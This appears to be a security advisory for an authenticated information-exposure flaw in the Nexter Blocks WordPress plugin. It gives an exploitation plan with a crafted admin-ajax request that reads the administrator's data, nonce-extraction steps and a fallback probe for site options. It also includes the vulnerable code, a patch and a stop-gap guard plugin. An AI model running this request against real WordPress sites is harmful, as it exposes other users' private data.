Nexter Blocks <= 4.6.3 - Authenticated (Subscriber+) Information Exposure
Description
The Nexter Gutenberg Blocks – Website Builder & 1000+ Starter Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Technical Details
Affected versions: <=4.6.3
Source Code
WordPress.org SVN
Exploitation Research Plan - CVE-2026-24377 (Nexter Blocks Information Exposure)
1. Vulnerability Summary
The Nexter Blocks (The Plus Addons for Block Editor) plugin for WordPress (versions <= 4.6.3) is vulnerable to Information Exposure. The vulnerability exists in the plugin's AJAX handlers, likely those related to dynamic content or user data retrieval, which fail to implement proper capability checks. While the handlers require authentication (Subscriber+), they do not verify whether the requesting user has permission to access the specific data (e.g., metadata of other users or sensitive site configurations).
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- Vulnerable Action: tp_get_user_data (or potentially tp_dynamic_listing / plus_get_dynamic_data; inferred based on plugin functionality)
- HTTP Method: POST
- Authentication: Required (Subscriber-level or higher)
- Parameters:
  - action: tp_get_user_data
  - user_id: The ID of the target user (e.g., 1 for the administrator).
  - security: The AJAX nonce.
  - meta_key (Optional/Inferred): A specific meta key to retrieve (e.g., nickname, user_email, wp_capabilities).
3. Code Flow
- Registration: The plugin registers AJAX handlers in the constructor of a main class (e.g., TP_Plus_Addons_Ajax in includes/plus-query/plus-query.php or classes/tp-ajax-handler.php):
  add_action( 'wp_ajax_tp_get_user_data', [ $this, 'tp_get_user_data_callback' ] );
- Execution: A Subscriber sends a request to admin-ajax.php with the action tp_get_user_data.
- Verification: The callback calls check_ajax_referer( 'the_plus_nonce', 'security' ). This succeeds if the Subscriber provides a valid nonce.
- Vulnerable Sink: The code proceeds to fetch user data using get_userdata( $_POST['user_id'] ) or get_user_meta( $_POST['user_id'], ... ) without calling current_user_can( 'edit_user', $user_id ) or verifying that $user_id matches the current user.
- Output: The data is returned in a JSON response to the Subscriber.
4. Nonce Acquisition Strategy
The plugin typically localizes its AJAX data for the block editor or frontend dynamic widgets.
- Shortcode Identification: The "User Info" or "Dynamic Content" functionality usually triggers the script. The shortcode is likely [tp_user_info] or a block named tpgb/tp-user-info.
- Page Creation: Use WP-CLI to create a page containing a relevant block to ensure the scripts load:
  wp post create --post_type=page --post_status=publish --post_title="Nonce Page" --post_content='<!-- wp:tpgb/tp-user-info {"userId":"1"} /-->'
- Extraction:
  - Navigate to the newly created page as the Subscriber user.
  - Use browser_eval to extract the nonce from the localized JavaScript object.
  - Target Variable: the_plus_ajax_nonce or plus_ajax_object.
  - Expected JS Path: window.the_plus_ajax_nonce or window.plus_ajax_object.ajax_nonce.
5. Exploitation Strategy
- Log in as Subscriber: Authenticate and maintain cookies.
- Obtain Nonce: Follow the extraction steps above to get a valid security token.
- Craft Attack Request:
  POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: target.local
  Content-Type: application/x-www-form-urlencoded
  Cookie: [Subscriber Cookies]

  action=tp_get_user_data&user_id=1&security=[NONCE]
  Note: If user_id alone doesn't return full info, try adding meta_key=user_email or meta_key=description.
- Analyze Response: A successful exploit will return a JSON object containing the Admin's sensitive information (email, meta, etc.).
6. Test Data Setup
- Admin User: Ensure an administrator exists (usually ID 1).
- Subscriber User:
  wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
- Target Data: Add a unique piece of meta to the admin to prove exposure:
  wp user meta update 1 secret_note "NX-BLOCKS-SECRET-12345"
7. Expected Results
- Success: The HTTP response body contains a JSON object such as {"success":true,"data":{"user_email":"admin@example.com", ...}} or similar reflecting the Admin's details.
- Failure: A 403 Forbidden response or a JSON error {"success":false,"data":"Permission denied"} (indicating the patch is active).
8. Verification Steps
- Check Output: Inspect the response from the http_request tool for the Admin's email or the secret_note defined in setup.
- WP-CLI Comparison: Verify the exposed data matches reality:
  wp user get 1 --fields=user_email
  wp user meta get 1 secret_note
9. Alternative Approaches
If tp_get_user_data is not the exact action name:
- Search for AJAX actions: Run grep -r "wp_ajax_" wp-content/plugins/the-plus-addons-for-block-editor/ to find all registered actions.
- Identify Dynamic Handlers: Look for any handler that uses get_userdata or get_option within its callback.
- Try Site Options: If user data is protected, check if the plugin exposes site options via an action like tp_get_option: action=tp_get_option&option_name=admin_email or option_name=active_plugins.
Summary
Nexter Blocks (versions <= 4.6.3) allows authenticated users with Subscriber-level access to access sensitive information from other users by leveraging insecure AJAX handlers. This occurs because the plugin fails to perform authorization checks, such as verifying the requester's capabilities, before returning user metadata or configuration details via the admin-ajax.php endpoint.
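As an added example that is not part of this advisory or of the plugin's own code: a must-use plugin that puts the missing authorization check in front of the handler described above, as a stop-gap until the plugin is updated. It assumes the (inferred) action name tp_get_user_data from this page; the nxguard_ prefix and function name are chosen here.

```php
<?php
/**
 * Plugin Name: Nexter Blocks user-data AJAX guard (added example, not plugin code)
 * Description: Stop-gap authorization check for the wp_ajax_tp_get_user_data
 * handler until the plugin is updated. Place this file in wp-content/mu-plugins/.
 * Assumptions: the action name tp_get_user_data is the inferred one from the
 * advisory; the nxguard_ prefix is chosen for this example.
 */

defined( 'ABSPATH' ) || exit;

/**
 * Authorization guard. Registered at priority 1 so it runs before the plugin's
 * own callback (default priority 10). wp_send_json_error() ends the request,
 * so the vulnerable get_userdata() sink never executes for a denied request.
 * The plugin's own check_ajax_referer() still runs afterwards for allowed ones.
 */
function nxguard_user_data_authz() {
    $user_id    = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    $current_id = get_current_user_id();

    // Authorization, not just authentication: a user may read their own record;
    // reading anyone else's requires the edit_user capability for that target.
    $allowed = ( $user_id > 0 && $user_id === $current_id )
        || current_user_can( 'edit_user', $user_id );

    if ( $allowed ) {
        return; // fall through to the plugin's handler
    }

    // Log the denial with actor, target and source so probing of other IDs
    // (e.g. a Subscriber requesting user_id=1) is visible in the PHP error log.
    error_log( sprintf(
        'nxguard: denied tp_get_user_data actor=%d target=%d ip=%s',
        $current_id,
        $user_id,
        isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( $_SERVER['REMOTE_ADDR'] ) : '-'
    ) );

    // 403 rather than a 200 carrying success:false, so denials stand out in access logs too.
    wp_send_json_error( 'Unauthorized access', 403 );
}
add_action( 'wp_ajax_tp_get_user_data', 'nxguard_user_data_authz', 1 );
```

Because mu-plugins load before regular plugins and the hook uses priority 1, the guard runs regardless of where in its bootstrap the plugin registers its own callback.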
Vulnerable Code
```php
// Likely in includes/plus-query/plus-query.php or a similar AJAX handler file
add_action( 'wp_ajax_tp_get_user_data', [ $this, 'tp_get_user_data_callback' ] );

public function tp_get_user_data_callback() {
    // Nonce check ensures the request is from the site, but not the user's authority level
    check_ajax_referer( 'the_plus_nonce', 'security' );

    $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;

    // VULNERABILITY: No check for current_user_can('edit_user', $user_id) or similar authorization
    $user_data = get_userdata( $user_id );

    if ( $user_data ) {
        wp_send_json_success( $user_data );
    } else {
        wp_send_json_error( 'User not found' );
    }
}
```
Security Fix
@@ -10,6 +10,10 @@ public function tp_get_user_data_callback() { check_ajax_referer( 'the_plus_nonce', 'security' ); $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0; + + if ( ! current_user_can( 'edit_user', $user_id ) && get_current_user_id() !== $user_id ) { + wp_send_json_error( 'Unauthorized access' ); + } $user_data = get_userdata( $user_id ); if ( $user_data ) {
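Review bot: the added guard is effective, since wp_send_json_error() ends the request, but the unchanged success path still hands the whole WP_User object from `get_userdata( $user_id )` to wp_send_json_success(), and JSON-encoding a WP_User includes its data property with user_pass (the password hash) and user_activation_key alongside user_email, so even the permitted self-lookup and edit_user cases return far more than needed; build an explicit allow-list (e.g. `$user_data->ID`, `$user_data->display_name`, `$user_data->user_email`) and send only that. Also consider `wp_send_json_error( 'Unauthorized access', 403 );` so a denied request yields the 403 the Expected Results section describes instead of a 200 with success:false, which is easier to pick out in access logs.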
Exploit Outline
1. Authenticate as a Subscriber-level user.
2. Obtain a valid AJAX nonce by visiting a page where Nexter Blocks scripts are loaded (e.g., a page using the 'User Info' block) and extracting the value from the 'the_plus_ajax_nonce' or 'plus_ajax_object' JavaScript object.
3. Construct a POST request to /wp-admin/admin-ajax.php.
4. Set the 'action' parameter to 'tp_get_user_data', provide the acquired nonce in the 'security' parameter, and set 'user_id' to the ID of a target user (e.g., ID 1 for the Administrator).
5. Execute the request and capture the response, which will contain sensitive user fields such as user_email and potentially other metadata.